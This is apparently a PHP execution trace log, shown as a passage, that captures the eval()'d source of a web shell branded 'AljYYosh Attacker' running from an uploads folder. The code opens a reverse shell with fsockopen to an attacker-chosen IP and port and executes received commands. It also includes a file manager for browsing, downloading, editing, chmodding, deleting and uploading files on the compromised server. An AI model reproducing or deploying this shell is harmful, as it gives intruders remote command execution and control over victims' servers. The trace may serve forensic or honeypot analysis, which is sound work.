Back\'>\r\n\r\n\t\t\t</form>";\r\n\r\n\t\t $mip=$_POST[\'mip\'];\r\n\r\n\t\t $bport=$_POST[\'bport\'];\r\n\r\n\t\t if ($mip <> "")\r\n\r\n\t\t {\r\n\r\n\t\t $fp=fsockopen($mip , $bport , $errno, $errstr);\r\n\r\n\t\t if (!$fp){\r\n\r\n\t\t       $result = "Error: could not open socket connection";\r\n\r\n\t\t }\r\n\r\n\t\t else {\r\n\r\n\t\t fputs ($fp ,"\\n*********************************************\\nWelcome T0 AljYYosh Attacker 1.0.5  ready 2 USe\\n*********************************************\\n\\n");\r\n\r\n\t  while(!feof($fp)){ \r\n\r\n       fputs ($fp," bash # ");\r\n\r\n       $result= fgets ($fp, 4096);\r\n\r\n      $message=`$result`;\r\n\r\n       fputs ($fp,"--> ".$message."\\n");\r\n\r\n      }\r\n\r\n      fclose ($fp);\r\n\r\n\t\t }\r\n\r\n\t\t }\r\n\r\n\t\t\t}\r\n\r\n\t\t\t\r\n\r\n\t\t//********************************************************\r\n\r\n\t\t\t//Spy File Manager\r\n\r\n\t\t\t$homedir=getcwd();\r\n\r\n\t\t\t$dir=realpath($_GET[\'dir\'])."/";\r\n\r\n\t\t\tif ($id=="fm"){\r\n\r\n\t\t\techo "<br><b><p align=\'left\'>&nbsp;Home:</b> $homedir \r\n\r\n                  &nbsp;<b>\r\n\r\n                  <form action=\'\' method=\'GET\'>\r\n\r\n                  &nbsp;Path:</b>\r\n\r\n                  <input type=\'hidden\' name=\'id\' value=\'fm\'>\r\n\r\n                  <input type=\'text\' name=\'dir\' size=\'80\' value=\'$dir\'>\r\n\r\n                  <input type=\'submit\' value=\'dir\'>\r\n\r\n                  </form>\r\n\r\n                 <br>";\r\n\r\n\r\n\r\n\t\t\techo "\r\n\r\n\r\n\r\n<div align=\'center\'>\r\n\r\n\r\n\r\n<table border=\'1\' id=\'table1\' style=\'border: 1px #333333\' height=\'90\' cellspacing=\'0\' cellpadding=\'0\'>\r\n\r\n\t<tr>\r\n\r\n\t\t<td width=\'300\' height=\'30\' align=\'left\'><b><font size=\'2\'>File / Folder Name</font></b></td>\r\n\r\n\t\t<td height=\'28\' width=\'82\' align=\'center\'>\r\n\r\n\t\t<font color=\'#000080\' size=\'2\'><b>Size KByte</b></font></td>\r\n\r\n\t\t<td height=\'28\' width=\'83\' align=\'center\'>\r\n\r\n\t\t<font color=\'#008000\' size=\'2\'><b>Download</b></font></td>\r\n\r\n\t\t<td height=\'28\' width=\'66\' align=\'center\'>\r\n\r\n\t\t<font color=\'#FF9933\' size=\'2\'><b>Edit</b></font></td>\r\n\r\n\t\t<td height=\'28\' width=\'75\' align=\'center\'>\r\n\r\n\t\t<font color=\'#999999\' size=\'2\'><b>Chmod</b></font></td>\r\n\r\n\t\t<td height=\'28\' align=\'center\'><font color=\'#FF0000\' size=\'2\'><b>Delete</b></font></td>\r\n\r\n\t</tr>";\r\n\r\n\t\t    if (is_dir($dir)){\r\n\r\n\t\t    if ($dh=opendir($dir)){\r\n\r\n\t\t    while (($file = readdir($dh)) !== false) {\r\n\r\n\t\t    $fsize=round(filesize($dir . $file)/1024);\r\n\r\n\t\t\r\n\r\n\t\t    \r\n\r\n\techo " \r\n\r\n\t<tr>\r\n\r\n\t\t<th width=\'250\' height=\'22\' align=\'left\' nowrap>";\r\n\r\n\t\tif (is_dir($dir.$file))\r\n\r\n\t\t{\r\n\r\n\t\techo "<a href=\'?id=fm&dir=$dir$file\'><span style=\'text-decoration: none\'><font size=\'2\' color=\'#666666\'>&nbsp;$file <font color=\'#FF0000\' size=\'1\'>dir</font>";\r\n\r\n\t\t}\r\n\r\n\t\telse {\r\n\r\n\t\techo "<font size=\'2\' color=\'#666666\'>&nbsp;$file ";\r\n\r\n\t\t}\r\n\r\n\t\techo "</a></font></th>\r\n\r\n\t\t<td width=\'113\' align=\'center\' nowrap><font color=\'#000080\' size=\'2\'><b>";\r\n\r\n\t\tif (is_file($dir.$file))\r\n\r\n\t\t{\r\n\r\n\t\techo "$fsize";\r\n\r\n\t\t}\r\n\r\n\t\telse {\r\n\r\n\t\techo "&nbsp; ";\r\n\r\n\t\t}\r\n\r\n\t\techo "\r\n\r\n\t\t</b></font></td>\r\n\r\n\t\t<td width=\'103\' align=\'center\' nowrap>";\r\n\r\n\t\tif (is_file($dir.$file)){\r\n\r\n\t\tif (is_readable($dir.$file)){\r\n\r\n\t\techo "<a href=\'?id=fm&fdownload=$dir$file\'><span style=\'text-decoration: none\'><font size=\'2\' color=\'#008000\'>download";\r\n\r\n\t\t}else {\r\n\r\n\t\techo "<font size=\'1\' color=\'#FF0000\'><b>No ReadAble</b>";\r\n\r\n\t\t }\r\n\r\n\t\t}else {\r\n\r\n\t\techo "&nbsp;";\r\n\r\n\t\t }\r\n\r\n\t\techo "\r\n\r\n\t\t</a></font></td>\r\n\r\n\t\t<td width=\'77\' align=\'center\' nowrap>";\r\n\r\n\t\tif (is_file($dir.$file))\r\n\r\n\t\t{\r\n\r\n\t\tif (is_readable($dir.$file)){\r\n\r\n\t\techo "<a target=\'_blank\' href=\'?id=fm&fedit=$dir$file\'><span style=\'text-decoration: none\'><font color=\'#FF9933\' size=\'2\'>Edit";\r\n\r\n\t\t}else {\r\n\r\n\t\techo "<font size=\'1\' color=\'#FF0000\'><b>No ReadAble</b>";\r\n\r\n\t\t }\r\n\r\n\t\t}else {\r\n\r\n\t\techo "&nbsp;";\r\n\r\n\t\t }\r\n\r\n\t\techo "\r\n\r\n\t\t</a></font></td>\r\n\r\n\t\t<td width=\'86\' align=\'center\' nowrap>";\r\n\r\n\t\tif (strtoupper(substr(PHP_OS, 0, 3)) === \'WIN\') {\r\n\r\n\t\techo "<font size=\'1\' color=\'#999999\'>Dont in windows";\r\n\r\n\t\t}\r\n\r\n\t\telse {\r\n\r\n\t\techo "<a href=\'?id=fm&fchmod=$dir$file\'><span style=\'text-decoration: none\'><font size=\'2\' color=\'#999999\'>Chmod";\r\n\r\n\t\t}\r\n\r\n\t\techo "</a></font></td>\r\n\r\n\t\t<td width=\'86\'align=\'center\' nowrap><a href=\'?id=fm&fdelete=$dir$file\'><span style=\'text-decoration: none\'><font size=\'2\' color=\'#FF0000\'>Delete</a></font></td>\r\n\r\n\t</tr>\r\n\r\n\t";\r\n\r\n\t\t      }\r\n\r\n\t\t      closedir($dh);\r\n\r\n\t\t    } \r\n\r\n\t\t    }\r\n\r\n\t\t    echo "</table>\r\n\r\n<form enctype=\'multipart/form-data\' action=\'\' method=\'POST\'>\r\n\r\n <input type=\'hidden\' name=\'MAX_FILE_SIZE\' value=\'300000\' />\r\n\r\n Send this file: <input name=\'userfile\' type=\'file\' />\r\n\r\n <inpt type=\'hidden\' name=\'Fupath\'  value=\'$dir\'>\r\n\r\n <input type=\'submit\' value=\'Send File\' />\r\n\r\n</form> \r\n\r\n\t\t    </div>";\r\n\r\n\t\t\t}\r\n\r\n//Upload Files \r\n\r\n$rpath=$_GET[\'dir\'];\r\n\r\nif ($rpath <> "") {\r\n\r\n$uploadfile = $rpath."/" . $_FILES[\'userfile\'][\'name\'];\r\n\r\nprint "<pre>";\r\n\r\nif (move_uploaded_file($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)) {\r\n\r\necho "<script language=\'javascript\'> alert(\'\\:D Successfully uploaded.!\')</script>";\r\n\r\necho "<script language=\'javascript\'> history.back(2)</script>";\r\n\r\n}\r\n\r\n }\r\n\r\n //file deleted\r\n\r\n$frpath=$_GET[\'fdelete\'];\r\n\r\nif ($frpath <> "") {\r\n\r\nif (is_dir($frpath)){\r\n\r\n$matches = glob($frpath . \'/*.*\');\r\n\r\nif ( is_array ( $matches ) ) {\r\n\r\n  foreach ( $matches as $filename) {\r\n\r\n  unlink ($filename);\r\n\r\n  rmdir("$frpath");\r\n\r\necho "<script language=\'javascript\'> alert(\'Success! Please refresh\')</script>";\r\n\r\necho "<script language=\'javascript\'> history.back(1)</script>";\r\n\r\n  }\r\n\r\n  }\r\n\r\n  }\r\n\r\n  else{\r\n\r\necho "<script language=\'javascript\'> alert(\'Success! Please refresh\')</script>";\r\n\r\nunlink ("$frpath");\r\n\r\necho "<script language=\'javascript\'> history.back(1)</script>";\r\n\r\nexit(0);\r\n\r\n\r\n\r\n  }\r\n\r\n  \r\n\r\n\r\n\r\n}\r\n\r\n\t\t\t?>\r\n\r\n\t\t\t\r\n\r\n\t\t\t</td>\r\n\r\n\t\t</tr>\r\n\r\n\t\t<tr>\r\n\r\n\t\t\t<td style="border: 1px dotted #FFCC66">\r\n\r\n\t\t\t<p align="center"><font color="#666666" size="1" face="Tahoma"><br>\r\n\r\n\t\t\tCopyright 2014-AlJyyosh Security<br>\r\n\r\n\t\t\tDaRk-PRiNcE110<br>\r\n\r\n\t\t\t</font><font color="#c0c0c0" size="1" face="Tahoma">\r\n\r\n\t\t<a style="TEXT-DECORATION: none" href="http://www.aljyyosh.com/vb">\r\n\r\n\t\t<font color="#666666">WWW.aljyyosh.COM/vb</font></a></font></td>\r\n\t\t\r\n\t\t</tr>\r\n\r\n\t</table>\r\n\r\n</div>\r\n\r\n\r\n\r\n</body>\r\n\r\n\r\n\r\n</html>\r\n'	/var/www/html/uploads/aljyysoh.php(102) : eval()'d code	1	0
3		A						/var/www/html/uploads/aljyysoh.php(102) : eval()'d code(1) : eval()'d code	5	$fdownload = NULL
3	9	1	0.001658	464216
2	5	1	0.001668	444544
1	3	1	0.001676	427064
			0.001700	338888
TRACE END   [2023-02-13 01:48:18.072195]